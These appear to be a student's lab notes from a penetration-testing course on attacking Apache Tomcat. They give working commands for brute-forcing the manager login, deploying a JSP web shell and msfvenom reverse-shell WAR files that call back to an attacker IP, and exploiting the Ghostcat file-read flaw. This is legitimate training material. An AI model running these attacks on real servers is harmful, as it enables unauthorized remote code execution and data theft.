10 - Attacking Tomcat

# Intro - As described in the previous section, once we have identified a tomcat instance and if we can access the `/manager` or `/host-manager` endpoints, we can likely achieve RCE on the Tomcat server # Tomcat Manager - Login Bruteforce ## MSF module - As one example, we can use the [auxiliary/scanner/http/tomcat_mgr_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/tomcat_mgr_login/) Metasploit module ```shell-session msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST web01.inlanefreight.local msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180 msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.201.58 msf6 auxiliary(scanner/http/tomcat_mgr_login) > run ``` - We get a hit for `tomcat:admin` from the above - If we are having issues, we can always use `Burp` to proxy the traffic and troubleshoot - To do this, first, fire up Burp Suite and then set the `PROXIES` option like the following ```bash msf6 auxiliary(scanner/http/tomcat_mgr_login) > set PROXIES HTTP:127.0.0.1:8080 ``` - We can see how the scanner is working from the `Burp` requests ![[images/Pasted image 20260121191736.png]] ## Python script - We can also use [this](https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce) Python script to achieve the same result - The `-P` flag is used to specify the path such as `/manager` - The `-u` flag is used to specify a username list, and the `-p` flag is used to specify a password list ```bash python3 mgr_brute.py -h #shows help menu python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt ``` # Tomcat Manager - WAR File Upload - Many Tomcat installations provide a GUI interface to manage the application - This interface is available at `/manager/html` by default, which only users assigned the `manager-gui` role are allowed to access ![[images/Pasted image 20260121192128.png]] - Valid manager credentials can be used to upload a packaged Tomcat application (.WAR file) and compromise the application - A WAR, or Web Application Archive, is used to quickly deploy web applications and backup storage - A WAR file can be created using the zip utility ## JSP webshell - A JSP web shell such as [this](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) can be downloaded and placed within the archive ```bash wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp zip -r backup.war cmd.jsp ``` - Click `Browse` and select the above `.war` file, then click `Deploy` ![[images/Pasted image 20260121192254.png]] - This file is uploaded to the manager GUII, after which the `/backup` application will be added to the table ![[images/Pasted image 20260121192327.png]] - Note: The upload location is `/opt/tomcat/apache-tomcat-10.0.10/webapps` - If we click on `backup`, we will get redirected to `http://web01.inlanefreight.local:8180/backup/` and get a `404 Not Found` error - Instead, we need to specify the `cmd.jsp` file in the URL as well by browsing or using `cURL` on `http://web01.inlanefreight.local:8180/backup/cmd.jsp` - This will present us with a web shell that we can use to run commands on the Tomcat server ```bash curl http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=id ``` ## MSFVenom - We could also use `msfvenom` to generate a malicious WAR file - The payload [java/jsp_shell_reverse_tcp](https://github.com/iagox86/metasploit-framework-webexec/blob/master/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb) will execute a reverse shell through a JSP file ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war ``` - Browse to the Tomcat console and deploy this file - Tomcat automatically extracts the WAR file contents and deploys it - Start an `nc` listener with `nc -lvnp 4443` and click on `/backup` to execute the shell ## MSF Module - The [multi/http/tomcat_mgr_upload](https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_upload/) Metasploit module can be used to automate the process shown above # CVE-2020-1938 : Ghostcat - Tomcat was found to be vulnerable to an unauthenticated LFI in a semi-recent discovery named [Ghostcat](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938) - All Tomcat versions before 9.0.31, 8.5.51, and 7.0.100 were found vulnerable - This vuln was caused by a misconfiguration in the AJP protocol used by Tomcat, where AJP stands for Apache Jserv Protocol, which is a binary protocol used to proxy requests - This is typically used in proxying requests to application servers behind the front-end web servers - The AJP service typically runs on port 80008; let's check with the below `nmap` scan ```bash nmap -sV -p 8009,8080 app-dev.inlanefreight.local ``` - Assuming the above scan confirms that ports 8080 and 8009 are open, the PoC code for the vuln can be found [here](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi) - Download the script and save it locally - The exploit can only read files and folders within the web apps folder, which means that files like `/etc/passwd` can’t be accessed - So, let’s attempt to access `web.xml` ```bash python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml ``` # Exercise ## Initial Enum - `ping` test ![[images/Pasted image 20260121193457.png]] - `nmap` scans ![[images/Pasted image 20260121193658.png]] - modify `/etc/hosts` ![[images/Pasted image 20260121193541.png]] - visit page ![[images/Pasted image 20260121193631.png]] ## Login Bruteforce - Use `tomcat_mgr_login` module from MSF ![[images/Pasted image 20260121193752.png]] - Set options ![[images/Pasted image 20260121193921.png]] - Creds found ![[images/Pasted image 20260121194016.png]] ## Gain RCE - use `msfvenom` to create payload ```bash sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.161 LPORT=4443 -f war -o backup.war ``` - Browse to `http://web01.inlanefreight.local:8180/manager/html` and enter creds - we're in ![[images/Pasted image 20260121194331.png]] - Browse for a `.war` file to deploy, then click `Deploy` - We see `/backup` int he table now ![[images/Pasted image 20260121194437.png]] - Browse to `http://web01.inlanefreight.local:8180/backup/` - We have a hit on our listener ![[images/Pasted image 20260121194610.png]] - Find `tomcat_flag.txt` - Note: file upload location is `/opt/tomcat/apache-tomcat-10.0.10/webapps` ![[images/Pasted image 20260121200032.png]]